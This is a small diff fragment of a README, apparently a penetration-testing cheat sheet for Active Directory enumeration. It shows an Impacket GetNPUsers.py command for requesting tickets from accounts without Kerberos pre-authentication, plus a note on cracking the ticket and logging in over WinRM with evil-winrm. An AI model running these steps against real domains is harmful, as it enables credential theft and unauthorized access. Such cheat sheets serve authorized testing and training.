lexisrepo/External-Enumeration/README.md

 ➤ Request a TGT ticket
 ./GetNPUsers.py DOMAIN/USERNAME -dc-ip <IP> -no-pass

-Crack the obtained TGT ticket then used is again port 5985 using evil-winrm
+➤ Next steps: Crack the obtained TGT ticket then used is again port 5985 using evil-winrm
 ```

 #### With user account